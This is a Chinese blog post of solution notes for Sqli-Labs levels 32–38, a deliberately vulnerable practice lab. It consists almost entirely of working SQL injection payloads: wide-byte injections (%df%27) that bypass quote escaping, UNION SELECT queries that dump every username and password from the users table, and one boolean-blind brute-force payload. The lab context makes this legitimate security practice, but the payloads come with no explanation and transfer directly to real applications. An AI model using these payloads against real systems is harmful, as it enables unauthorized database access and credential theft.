Sqli-Labs做题笔记:Less-32 - Less-38

本文提供了宽字节注入攻击的具体实例,展示了如何利用特殊字符绕过应用程序的安全检查,从而获取数据库中的用户名和密码等敏感信息。

宽字节注入:

Less-32:

http://localhost/sqlilabs/Less-32/?id=-1%df%27%20union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00

Less-33:

http://localhost/sqlilabs/Less-33/?id=-1%df%27union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users)%20--+

Less-34:

uname=-1%df%27 union select (select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users) #&passwd=a&submit=Submit

Less-35:

http://localhost/sqlilabs/Less-35/?id=0 ||(select(ascii(mid((concat((select(group_concat(username))from(users))))from(7)for(1)))=§110§))--+
http://localhost/sqlilabs/Less-35/?id=0%20union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users)%20#

Less-36:

http://localhost/sqlilabs/Less-36/?id=0%df%27%20union%20select%201,(select%20group_concat(username)%20from%20security.users),(select%20group_concat(password)%20from%20security.users)--+

Less-37:

uname=1%df' union select (select%20group_concat(username)%20from%20security.users),(select%20group_concat(password)%20from%20security.users) #&passwd=aa&submit=Submit

Less-38:

http://localhost/sqlilabs/Less-38/?id=0%df%27%20union%20select%201,(select%20group_concat(username)%20from%20security.users),(select%20group_concat(password)%20from%20security.users)--+
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值